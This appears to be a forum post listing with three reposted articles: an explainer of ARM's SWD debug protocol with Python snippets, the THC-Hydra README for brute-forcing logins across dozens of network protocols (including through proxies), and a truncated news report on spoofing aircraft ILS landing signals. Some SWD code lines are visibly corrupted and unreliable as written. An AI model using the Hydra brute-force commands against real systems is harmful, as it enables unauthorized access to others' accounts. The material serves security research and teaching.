-
Posts
18785 -
Joined
-
Last visited
-
Days Won
738
Everything posted by Nytro
-
SWD – ARM’s alternative to JTAG May 16, 2019 Nicolas Oberli Embedded Leave a comment For embedded developers and hardware hackers, JTAG is the de facto standard for debugging and accessing microprocessor registers. This protocol has been in use for many years and is still in use today. Its main drawback is that it uses a lot of signals to work (at least 4 – TCK, TMS, TDI, TDO). This has become a problem now that devices have gotten smaller and smaller and low pin count microcontrollers are available. To address this, ARM created an alternative debug interface called SWD (Serial Wire Debug) that only uses two signals (SWDCLK and SWDIO). This interface and its associated protocol are now available in nearly all Cortex-[A,R,M] processors. ARM Debug Interface Architecture Overview Contrary to JTAG, which chains TAPs together, SWD uses a bus called DAP (Debug Access Port). On this DAP, there is one master (the DP – Debug Port) and one or more slaves (AP – Access Ports), similar to JTAG TAPs. The DP communicates with the APs using packets that contain the AP address. To sum this up, an external debugger connects to the DAP via the DP using a protocol called SWD. This whitepaper from ARM shows a nice overview of the SWD architecture : SWD architecture Debug ports The Debug Port is the interface between the host and the DAP. It also handles the host interface. There are three different Debug Ports available to access the DAP : JTAG Debug Port (JTAG-DP). This port uses the standard JTAG interface and protocol to access the DAP Serial Wire Debug Port (SW-DP). This port uses the SWD protocol to access the DAP. Serial Wire / JTAG Debug Port (SWJ-DP). This port can use either JTAG or SWD to access the DAP. This is a common interface found on many microcontrollers. It reuses the TMS and TCK JTAG signals to transfer the SWDIO and SWDCLK signals respectively. A specific sequence has to be sent in order to switch from one interface to the other. Access Ports Multiple APs can be added to the DAP, depending on the needs. ARM provides specifications for two APs : Memory Access Port (MEM-AP). This AP provides access to the core memory aand registers. JTAG Access Port (JTAG-AP). This AP allows to connect a JTAG chain to the DAP. SWD protocol Signaling As said earlier, SWD uses only two signals : SWDCLK. The clock signal sent by the host. As there is no relation between the processor clock and the SWD clock, the frequency selection is up to the host interface. In this KB article, the maximum debug clock frequency is about 60MHz but varies in practice. SWDIO. This is the bidirectional signal carrying the data from/to the DP. The data is set by the host during the rising edge and sampled by the DP during the falling edge of the SWDCLK signal. Both lines should be pulled up on the target. Transactions Each SWD transaction has three phases : Request phase. 8 bits sent from the host. ACK phase. 3 bits sent from the target. Data phase. Up to 32 bits sent from/to the host, with an odd parity bit. Note that a Trn cycle has to be sent when the data direction has to change. SWD transfer Request The request header contains the following fields : Field Description Start Start bit. Should be 1 APnDP Access to DP(0) or AP(1) RnW Write(0) or Read(1) request A[2:3] AP or DP register address bits[2:3] Parity Odd parity over (APnDP, RnW, A[2:3]) Stop Stop bit. Should be 0 Park Park bit sent before changing SWDIO to open-drain. Should be 1 ACK The ACK bits contain the ACK status of the request header. Note that the three bits must be read LSB first. Bit Description 2 OK response. Operation was successful 1 WAIT response. Host must retry the request. 0 FAULT response. An error has occurred Data The data is sent either by the host or the target. It is sent LSB first, and ends with an odd parity bit. Protocol interaction Now that we know more about the low-level part of the protocol, it’s time to interact with an actual target. In order to do so, I used a Hydrabus but this can also be done using a Bus Pirate or any other similar tool. During this experiment, I used a STM32F103 development board, nicknamed Blue Pill. It is easily available and already has a SWD connector available. The ARM Debug Interface Architecture Specification document contains all the details needed to interact with the SWD interface, so let’s get started. SWD initialization As the target uses an SWJ-DP interface, it needs to be switched from the default JTAG mode to SWD. The chapter 5.2.1 of the document shows the sequence to be sent to switch from JTAG to SWD : 1. Send at least 50 SWCLKTCK cycles with SWDIOTMS HIGH. This ensures that the current interface is in its reset state. The JTAG interface only detects the 16-bit JTAG-to-SWD sequence starting from the Test-Logic-Reset state. 2. Send the 16-bit JTAG-to-SWD select sequence on SWDIOTMS. 3. Send at least 50 SWCLKTCK cycles with SWDIOTMS HIGH. This ensures that if SWJ-DP was already in SWD operation before sending the select sequence, the SWD interface enters line reset state. The sequence being 0b0111 1001 1110 0111 (0x79e7) MSB first, we need to use 0x7b 0x9e in LSB-first format. 1 2 3 4 5 6 7 import pyHydrabus r = pyHydrabus.RawWire('/dev/ttyACM0') r._config = 0xa # Set GPIO open-drain / LSB first r._configure_port() r.write(b'\xff\xff\xff\xff\xff\xff\x7b\x9e\xff\xff\xff\xff\xff\xff) Now that the DP is in reset state, we can issue a DPIDR read command to identify the Debug Port. To do so, we need to read DP register at address 0x00 | Start | APnDP | RnW | A[2:3] | Parity | Stop | Park | |-------|-------|-----|--------|--------|------|------| | 1 | 0 | 1 | 0 0 | 1 | 0 | 1 | = 0xa5 1 2 3 4 5 6 r.write(b'\x0f\x00\xa5') status = 0 for i in range(3? status += ord(r.read_bit())<<i print("Status: ",hex(status)) print("DPIDR", hex(int.from_bytes(r.read(4), byteorder="little"))) Next step is to power up the debug domain. Chapter 2.4.5 tells us that we need to set CDBGRSTREQ and CDBGRSTACK (bits 28 and 29) in the CTRL/STAT (address 0x4) register of the DP : 1 2 3 4 5 6 7 8 9 r.write(b'\x81') # Write request to DP register address 0x4 for _ in range(5? r.read_bit() # Do not take care about the response # Write 0x00000078-MSB in the CTRL/STAT register r.write(b'\x1e\x00\x00\x00\x00') # Send some clock cycles to sync up the line r.write(b'\x00') SWD usage Now that the debug power domain is up, the DAP is fully accessible. As a first discovery process, we will query an AP, then scan for all APs in the DAP. Reading from an AP Reading from an AP is always done via the DP. To query an AP, the host must tell the DP to write to an AP specified by an address on the DAP. To read data from a previous transaction, the DP uses a special register called RDBUFF (address 0xc). This means that the correct query method is the following : Write to DP SELECT register, setting the APSEL and APBANKSEL fields. Read the DP RDBUFF register once to “commit” the last transaction. Read the RDBUFF register again to read its actual value. The SELECT register is described on chapter 2.3.9, the interesting fields are noted here : Register Position Description APSEL [31:24] Selects the AP address. There are up to 255 APS on the DAP. APBANKSEL [7:4] Selects the AP register to query. In our case, we will query the IDR register to identify the AP type. One interesting AP register to read is the IDR register (address 0xf), which contains the identification information for this AP. The code below sums up the procedure to read IDR of AP at address 0x0. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 ap = 0 # AP address r.write(b'\xb1') # Write to DR SELECT register for _ in range(5? r.read_bit() # Don't read the status bits r.write(b'\xf0\x00\x00') # Fill APBANKSEL with 0xf r.write(ap.to_bytes(1, byteorder="little")) # Fill APSEL with AP address # This calculates the parity bit to be sent after the data phase if(bin(ap).count('1')%2) == 0: r.write(b'\x00') else: r.write(b'\x01') r.write(b'\x9f') # Read RDBUFF from DP status = 0 for i in range(3? status += ord(r.read_bit())<<i # Read transaction status print("Status: ",hex(status)) #Dummy read #print("dummy", hex(int.from_bytes(r.read(4), byteorder="little"))) r.read(4) r.write(b'\x00') r.write(b'\x9f') # Read RDBUFF from DP, this time for real status = 0 for i in range(3? status += ord(r.read_bit())<<i print("Status: ",hex(status)) idcode = hex(int.from_bytes(r.read(4), byteorder="little")) #Read actual value if idcode != '0x0': # If no AP present, value will be 0 print("AP", hex(ap), idcode) r.write(b'\x00') Scanning for APs With the exact same code, we can iterate on the whole address space and see if there are any other APs on the DAP : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 for ap in range(0x100? r.write(b'\x00') r.write(b'\xb1') for _ in range(5? r.read_bit() #r.write(b'\xf0\x00\x00\x00\x00') r.write(b'\xf0\x00\x00') r.write(ap.to_bytes(1, byteorder="little")) if(bin(ap).count('1')%2) == 0: r.write(b'\x00') else: r.write(b'\x01') r.write(b'\x9f') status = 0 for i in range(3? status += ord(r.read_bit())<<i #print("Status: ",hex(status)) #print("dummy", hex(int.from_bytes(r.read(4), byteorder="little"))) r.read(4) r.write(b'\x00') r.write(b'\x9f') status = 0 for i in range(3? status += ord(r.read_bit())<<i #print("Status: ",hex(status)) idcode = hex(int.from_bytes(r.read(4), byteorder="little")) if idcode != '0x0': print("AP", hex(ap), idcode) Running the script shows that there is only one AP on the bus. According to the documentation, it is the MEM-AP : > python3 /tmp/swd.py Status: 0x1 DPIDR 0x2ba01477 AP 0x0 0x24770011 From here, is is possible to send commands to the MEM-AP to query the processor memory. Discovering SWD pins On real devices, it is not always easy to determine which pins or testpoints are used for the debug interface. It is also true for JTAG, this is why tools like the JTAGulator exist. Its purpose is to discover JTAG interfaces by trying every pin combination until a combination returns a valid IDCODE. Now that we know better how a SWD interface is initialized, we can do about the same but for SWD interfaces. The idea is is the following : Take a number of interesting pins on a target board Wire them up on the SWD discovery device Select two pins on the SWD discovery device as SWDCLK and SWDIO Send the SWD initialization sequence. Read the status response and the DPIDR register If valid results, print the solution If no valid results, go to step 3 and select two new pins This method has been implemented for the Hydrabus firmware, and so far brings positive results. An example session is displayed here : > 2-wire Device: twowire1 GPIO resistor: floating Frequency: 1000000Hz Bit order: MSB first twowire1> brute 8 Bruteforce on 8 pins. Device found. IDCODE : 2BA01477 CLK: PB5 IO: PB6 twowire1> The operation takes less than two seconds, and reliably discovered SWD interfaces on all the tested boards so far. Conclusions In this post we showed how the ARM debug interface is designed, and how the SWD protocol is working at a very low level. With this information, it is possible to send queries to the MEM-AP using a simple microcontroller. This part goes far beyond this post purpose and will not be covered here. The PySWD library is a helpful resource to start interacting with the MEM-AP. We also showed how to implement a SWD detection tool to help finding SWD ports, similar to existing tools used for JTAG detection. Sursa: https://research.kudelskisecurity.com/2019/05/16/swd-arms-alternative-to-jtag/
-
INTRODUCTION Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. THIS TOOL IS FOR LEGAL PURPOSES ONLY! There are already several login hacker tools available, however, none does either support more than one protocol to attack or support parallelized connects. It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and MacOS. Currently this tool supports the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. However the module engine for new services is very easy so it won't take a long time until even more services are supported. Your help in writing, enhancing or fixing modules is highly appreciated!! WHERE TO GET You can always find the newest release/production version of hydra at its project page at https://github.com/vanhauser-thc/thc-hydra/releases If you are interested in the current development state, the public development repository is at Github: svn co https://github.com/vanhauser-thc/thc-hydra or git clone https://github.com/vanhauser-thc/thc-hydra Use the development version at your own risk. It contains new features and new bugs. Things might not work! HOW TO COMPILE To configure, compile and install hydra, just type: ./configure make make install If you want the ssh module, you have to setup libssh (not libssh2!) on your system, get it from http://www.libssh.org, for ssh v1 support you also need to add "-DWITH_SSH1=On" option in the cmake command line. IMPORTANT: If you compile on MacOS then you must do this - do not install libssh via brew! If you use Ubuntu/Debian, this will install supplementary libraries needed for a few optional modules (note that some might not be available on your distribution): apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \ libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \ firebird-dev libmemcached-dev This enables all optional modules and features with the exception of Oracle, SAP R/3, NCP and the apple filing protocol - which you will need to download and install from the vendor's web sites. For all other Linux derivates and BSD based systems, use the system software installer and look for similarly named libraries like in the command above. In all other cases, you have to download all source libraries and compile them manually. SUPPORTED PLATFORMS All UNIX platforms (Linux, *BSD, Solaris, etc.) MacOS (basically a BSD clone) Windows with Cygwin (both IPv4 and IPv6) Mobile systems based on Linux, MacOS or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq) HOW TO USE If you just enter hydra, you will see a short summary of the important options available. Type ./hydra -h to see all available command line options. Note that NO login/password file is included. Generate them yourself. A default password list is however present, use "dpl4hydra.sh" to generate a list. For Linux users, a GTK GUI is available, try ./xhydra For the command line usage, the syntax is as follows: For attacking one target or a network, you can use the new "://" style: hydra [some command line options] PROTOCOL://TARGET:PORT/MODULE-OPTIONS The old mode can be used for these too, and additionally if you want to specify your targets from a text file, you must use this one: hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS] Via the command line options you specify which logins to try, which passwords, if SSL should be used, how many parallel tasks to use for attacking, etc. PROTOCOL is the protocol you want to use for attacking, e.g. ftp, smtp, http-get or many others are available TARGET is the target you want to attack MODULE-OPTIONS are optional values which are special per PROTOCOL module FIRST - select your target you have three options on how to specify the target you want to attack: a single target on the command line: just put the IP or DNS address in a network range on the command line: CIDR specification like "192.168.0.0/24" a list of hosts in a text file: one line per entry (see below) SECOND - select your protocol Try to avoid telnet, as it is unreliable to detect a correct or false login attempt. Use a port scanner to see which protocols are enabled on the target. THIRD - check if the module has optional parameters hydra -U PROTOCOL e.g. hydra -U smtp FOURTH - the destination port this is optional! if no port is supplied the default common port for the PROTOCOL is used. If you specify SSL to use ("-S" option), the SSL common port is used by default. If you use "://" notation, you must use "[" "]" brackets if you want to supply IPv6 addresses or CIDR ("192.168.0.0/24") notations to attack: hydra [some command line options] ftp://[192.168.0.0/24]/ hydra [some command line options] -6 smtps://[2001:db8::1]/NTLM Note that everything hydra does is IPv4 only! If you want to attack IPv6 addresses, you must add the "-6" command line option. All attacks are then IPv6 only! If you want to supply your targets via a text file, you can not use the :// notation but use the old style and just supply the protocol (and module options): hydra [some command line options] -M targets.txt ftp You can supply also the port for each target entry by adding ":" after a target entry in the file, e.g.: foo.bar.com target.com:21 unusual.port.com:2121 default.used.here.com 127.0.0.1 127.0.0.1:2121 Note that if you want to attach IPv6 targets, you must supply the -6 option and must put IPv6 addresses in brackets in the file(!) like this: foo.bar.com target.com:21 [fe80::1%eth0] [2001::1] [2002::2]:8080 [2a01:24a:133:0:00:123:ff:1a] LOGINS AND PASSWORDS You have many options on how to attack with logins and passwords With -l for login and -p for password you tell hydra that this is the only login and/or password to try. With -L for logins and -P for passwords you supply text files with entries. e.g.: hydra -l admin -p password ftp://localhost/ hydra -L default_logins.txt -p test ftp://localhost/ hydra -l admin -P common_passwords.txt ftp://localhost/ hydra -L logins.txt -P passwords.txt ftp://localhost/ Additionally, you can try passwords based on the login via the "-e" option. The "-e" option has three parameters: s - try the login as password n - try an empty password r - reverse the login and try it as password If you want to, e.g. try "try login as password and "empty password", you specify "-e sn" on the command line. But there are two more modes for trying passwords than -p/-P: You can use text file which where a login and password pair is separated by a colon, e.g.: admin:password test:test foo:bar This is a common default account style listing, that is also generated by the dpl4hydra.sh default account file generator supplied with hydra. You use such a text file with the -C option - note that in this mode you can not use -l/-L/-p/-P options (-e nsr however you can). Example: hydra -C default_accounts.txt ftp://localhost/ And finally, there is a bruteforce mode with the -x option (which you can not use with -p/-P/-C): -x minimum_length:maximum_length:charset the charset definition is a for lowercase letters, A for uppercase letters, 1 for numbers and for anything else you supply it is their real representation. Examples: -x 1:3:a generate passwords from length 1 to 3 with all lowercase letters -x 2:5:/ generate passwords from length 2 to 5 containing only slashes -x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers Example: hydra -l ftp -x 3:3:a ftp://localhost/ SPECIAL OPTIONS FOR MODULES Via the third command line parameter (TARGET SERVICE OPTIONAL) or the -m command line option, you can pass one option to a module. Many modules use this, a few require it! To see the special option of a module, type: hydra -U e.g. ./hydra -U http-post-form The special options can be passed via the -m parameter, as 3rd command line option or in the service://target/option format. Examples (they are all equal): ./hydra -l test -p test -m PLAIN 127.0.0.1 imap ./hydra -l test -p test 127.0.0.1 imap PLAIN ./hydra -l test -p test imap://127.0.0.1/PLAIN RESTORING AN ABORTED/CRASHED SESSION When hydra is aborted with Control-C, killed or crashes, it leaves a "hydra.restore" file behind which contains all necessary information to restore the session. This session file is written every 5 minutes. NOTE: the hydra.restore file can NOT be copied to a different platform (e.g. from little endian to big endian, or from Solaris to AIX) HOW TO SCAN/CRACK OVER A PROXY The environment variable HYDRA_PROXY_HTTP defines the web proxy (this works just for the http services!). The following syntax is valid: HYDRA_PROXY_HTTP="http://123.45.67.89:8080/" HYDRA_PROXY_HTTP="http://login:password@123.45.67.89:8080/" HYDRA_PROXY_HTTP="proxylist.txt" The last example is a text file containing up to 64 proxies (in the same format definition as the other examples). For all other services, use the HYDRA_PROXY variable to scan/crack. It uses the same syntax. eg: HYDRA_PROXY=[connect|socks4|socks5]://[login:password@]proxy_addr:proxy_port for example: HYDRA_PROXY=connect://proxy.anonymizer.com:8000 HYDRA_PROXY=socks4://auth:pw@127.0.0.1:1080 HYDRA_PROXY=socksproxylist.txt ADDITIONAL HINTS sort your password files by likelihood and use the -u option to find passwords much faster! uniq your dictionary files! this can save you a lot of time cat words.txt | sort | uniq > dictionary.txt if you know that the target is using a password policy (allowing users only to choose a password with a minimum length of 6, containing a least one letter and one number, etc. use the tool pw-inspector which comes along with the hydra package to reduce the password list: cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt RESULTS OUTPUT The results are output to stdio along with the other information. Via the -o command line option, the results can also be written to a file. Using -b, the format of the output can be specified. Currently, these are supported: text - plain text format jsonv1 - JSON data using version 1.x of the schema (defined below). json - JSON data using the latest version of the schema, currently there is only version 1. If using JSON output, the results file may not be valid JSON if there are serious errors in booting Hydra. JSON Schema Here is an example of the JSON output. Notes on some of the fields: errormessages - an array of zero or more strings that are normally printed to stderr at the end of the Hydra's run. The text is very free form. success - indication if Hydra ran correctly without error (NOT if passwords were detected). This parameter is either the JSON value true or false depending on completion. quantityfound - How many username+password combinations discovered. jsonoutputversion - Version of the schema, 1.00, 1.01, 1.11, 2.00, 2.03, etc. Hydra will make second tuple of the version to always be two digits to make it easier for downstream processors (as opposed to v1.1 vs v1.10). The minor-level versions are additive, so 1.02 will contain more fields than version 1.00 and will be backward compatible. Version 2.x will break something from version 1.x output. Version 1.00 example: { "errormessages": [ "[ERROR] Error Message of Something", "[ERROR] Another Message", "These are very free form" ], "generator": { "built": "2019-03-01 14:44:22", "commandline": "hydra -b jsonv1 -o results.json ... ...", "jsonoutputversion": "1.00", "server": "127.0.0.1", "service": "http-post-form", "software": "Hydra", "version": "v8.5" }, "quantityfound": 2, "results": [ { "host": "127.0.0.1", "login": "bill@example.com", "password": "bill", "port": 9999, "service": "http-post-form" }, { "host": "127.0.0.1", "login": "joe@example.com", "password": "joe", "port": 9999, "service": "http-post-form" } ], "success": false } SPEED through the parallelizing feature, this password cracker tool can be very fast, however it depends on the protocol. The fastest are generally POP3 and FTP. Experiment with the task option (-t) to speed things up! The higher - the faster ? (but too high - and it disables the service) STATISTICS Run against a SuSE Linux 7.2 on localhost with a "-C FILE" containing 295 entries (294 tries invalid logins, 1 valid). Every test was run three times (only for "1 task" just once), and the average noted down. P A R A L L E L T A S K S SERVICE 1 4 8 16 32 50 64 100 128 ------- -------------------------------------------------------------------- telnet 23:20 5:58 2:58 1:34 1:05 0:33 0:45* 0:25* 0:55* ftp 45:54 11:51 5:54 3:06 1:25 0:58 0:46 0:29 0:32 pop3 92:10 27:16 13:56 6:42 2:55 1:57 1:24 1:14 0:50 imap 31:05 7:41 3:51 1:58 1:01 0:39 0:32 0:25 0:21 Note: telnet timings can be VERY different for 64 to 128 tasks! e.g. with 128 tasks, running four times resulted in timings between 28 and 97 seconds! The reason for this is unknown... guesses per task (rounded up): 295 74 38 19 10 6 5 3 3 guesses possible per connect (depends on the server software and config): telnet 4 ftp 6 pop3 1 imap 3 BUGS & FEATURES Hydra: Email me or David if you find bugs or if you have written a new module. vh@thc.org (and put "antispam" in the subject line) You should use PGP to encrypt emails to vh@thc.org : -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v3.3.3 (vh@thc.org) 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 zB3yrr+vYBT0uDWmxwPjiJs= =ytEf -----END PGP PUBLIC KEY BLOCK----- Sursa: https://github.com/vanhauser-thc/thc-hydra
-
The radio navigation planes use to land safely is insecure and can be hacked Radios that sell for $600 can spoof signals planes use to find runways. Dan Goodin - 5/15/2019, 1:00 PM Enlarge / A plane in the researchers' demonstration attack as spoofed ILS signals induce a pilot to land to the right of the runway. Sathaye et al. 104 with 75 posters participating Share on Facebook Share on Twitter Just about every aircraft that has flown over the past 50 years—whether a single-engine Cessna or a 600-seat jumbo jet—is aided by radios to safely land at airports. These instrument landing systems (ILS) are considered precision approach systems, because unlike GPS and other navigation systems, they provide crucial real-time guidance about both the plane’s horizontal alignment with a runway and its vertical angle of descent. In many settings—particularly during foggy or rainy night-time landings—this radio-based navigation is the primary means for ensuring planes touch down at the start of a runway and on its centerline. Like many technologies built in earlier decades, the ILS was never designed to be secure from hacking. Radio signals, for instance, aren’t encrypted or authenticated. Instead, pilots simply assume that the tones their radio-based navigation systems receive on a runway’s publicly assigned frequency are legitimate signals broadcast by the airport operator. This lack of security hasn’t been much of a concern over the years, largely because the cost and difficulty of spoofing malicious radio signals made attacks infeasible. Now, researchers have devised a low-cost hack that raises questions about the security of ILS, which is used at virtually every civilian airport throughout the industrialized world. Using a $600 software defined radio, the researchers can spoof airport signals in a way that causes a pilot’s navigation instruments to falsely indicate a plane is off course. Normal training will call for the pilot to adjust the plane’s descent rate or alignment accordingly and create a potential accident as a result. One attack technique is for spoofed signals to indicate that a plane’s angle of descent is more gradual than it actually is. The spoofed message would generate what is sometimes called a “fly down” signal that instructs the pilot to steepen the angle of descent, possibly causing the aircraft to touch the ground before reaching the start of the runway. The video below shows a different way spoofed signals can pose a threat to a plane that is in its final approach. Attackers can send a signal that causes a pilot’s course deviation indicator to show that a plane is slightly too far to the left of the runway, even when the plane is perfectly aligned. The pilot will react by guiding the plane to the right and inadvertently steer over the centerline. Wireless Attacks on Aircraft Landing Systems. The researchers, from Northeastern University in Boston, consulted a pilot and security expert during their work, and all are careful to note that this kind of spoofing isn't likely to cause a plane to crash in most cases. ILS malfunctions are a known threat to aviation safety, and experienced pilots receive extensive training in how to react to them. A plane that’s misaligned with a runway will be easy for a pilot to visually notice in clear conditions, and the pilot will be able to initiate a missed approach fly-around. Another reason for measured skepticism is the difficulty of carrying out an attack. In addition to the SDR, the equipment needed would likely require directional antennas and an amplifier to boost the signal. It would be hard to sneak all that gear onto a plane in the event the hacker chose an onboard attack. If the hacker chose to mount the attack from the ground, it would likely require a great deal of work to get the gear aligned with a runway without attracting attention. What's more, airports typically monitor for interference on sensitive frequencies, 